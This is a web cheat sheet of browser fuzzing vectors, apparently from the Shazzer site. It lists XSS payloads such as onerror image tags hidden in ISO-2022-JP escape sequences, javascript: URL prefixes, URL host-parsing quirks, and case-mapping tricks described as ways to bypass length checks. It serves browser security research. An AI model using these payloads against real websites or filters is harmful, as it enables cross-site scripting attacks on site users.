Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
let transformedChr = String.fromCodePoint(0).toUpperCase();
0 > 0x7f &&
/^\w+$/.test(transformedChr) &&
alert(0 + '=>' + transformedChr)
This vector demonstrates which code points transform to ASCII characters when using toUpperCase(). Related vector: https://shazzer.co.uk/vectors/661713f26438aee019a61a71
<a id="0x1B$@"></a>0x1B(B<a id="><img src=x onerror=alert(64)></a>
Which escape sequences will result in scrambled HTML.
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>
Which escape sequences will result in scrambled HTML.
let transformedChr = String.fromCodePoint(0).toLowerCase();
0 > 0x7f &&
/^\w+$/.test(transformedChr) &&
alert(0 + '=>' + transformedChr)
This vector demonstrates which code points transform to ASCII characters when using toLowerCase(). Related vector: https://shazzer.co.uk/vectors/661713f26438aee019a61a71
<0x1B(<img src onerror=alert(60)>
This vector demonstrates how to use the new bytes placeholder. Here we are fuzzing the characters to perform an ASCII escape sequence in ISO-2022-JP.
<0x1B(Bimg src onerror=alert(66)>
This vector demonstrates how to use the new bytes placeholder. Here we are fuzzing the characters to perform an ASCII escape sequence in ISO-2022-JP.
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>
Which escape sequences will normalize back to valid HTML.
<a id="0x1B$B"></a>0x1B(J<a id="><img src=x onerror=alert(74)></a>
Which escape sequences will normalize back to valid HTML.
anchor.href='/0x09/example.com';
if(anchor.host === 'example.com')alert(9)
This vector shows what characters are allowed inside slashes on an anchor href.
anchor.href='///example.com';
if(anchor.host === 'example.com')alert(47)
This vector shows what characters are allowed inside slashes on an anchor href.
anchor.href='/\/example.com';
if(anchor.host === 'example.com')alert(92)
This vector shows what characters are allowed inside slashes on an anchor href.
This XSS vector shows what characters can be used before the onerror event.
This vector shows what characters can be used to separate HTML attributes
document0x09['location'];alert(9)
List of characters allowed between an object and the first bracket notation.
document0x0A['location'];alert(10)
List of characters allowed between an object and the first bracket notation.
document0x0B['location'];alert(11)
List of characters allowed between an object and the first bracket notation.
document0x0C['location'];alert(12)
List of characters allowed between an object and the first bracket notation.
document0x0D['location'];alert(13)
List of characters allowed between an object and the first bracket notation.
<a href="https://0x09example.com/" id="test9"></a>
<a href="https://0x0Aexample.com/" id="test10"></a>
<a href="https://0x0Dexample.com/" id="test13"></a>
<a href="https:///example.com/" id="test47"></a>
<a href="https://@example.com/" id="test64"></a>
if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}
Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}
Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}
Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}
Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}
Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
const c = String.fromCodePoint(i)
const c_upper = c.toUpperCase()
if (c_upper.length > c.length && isASCII(c_upper)){
alert(c)
}
Useful to bypass strict length checks and differentials between toUpperCase() / toLowerCase().
<div style="/**/color:red;">test</div>
<div style="font-family:'blah';color:red"></div>
<a href="//test.com/" id="test47"></a>
I want to know which character after a slash is considered a slash and creates a protocol.
<a href="/\test.com/" id="test92"></a>
I want to know which character after a slash is considered a slash and creates a protocol.
window0x09.alert();alert(9)
List of characters allowed between an object and the dot operator located before the method/property.
window0x0A.alert();alert(10)
List of characters allowed between an object and the dot operator located before the method/property.
window0x0B.alert();alert(11)
List of characters allowed between an object and the dot operator located before the method/property.
window0x0C.alert();alert(12)
List of characters allowed between an object and the dot operator located before the method/property.
window0x0D.alert();alert(13)
List of characters allowed between an object and the dot operator located before the method/property.
const c = String.fromCodePoint(i);
if (c.length !== c.toUpperCase().length) alert(i)
if (new URL("https://example.co" + String.fromCodePoint(9) + "m").hostname === 'example.com'){alert(9)}
Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com".
if (new URL("https://example.co" + String.fromCodePoint(10) + "m").hostname === 'example.com'){alert(10)}
Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com".
if (new URL("https://example.co" + String.fromCodePoint(13) + "m").hostname === 'example.com'){alert(13)}
Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com".
if (new URL("https://example.co" + String.fromCodePoint(173) + "m").hostname === 'example.com'){alert(173)}
Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com".
if (new URL("https://example.co" + String.fromCodePoint(847) + "m").hostname === 'example.com'){alert(847)}
Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com".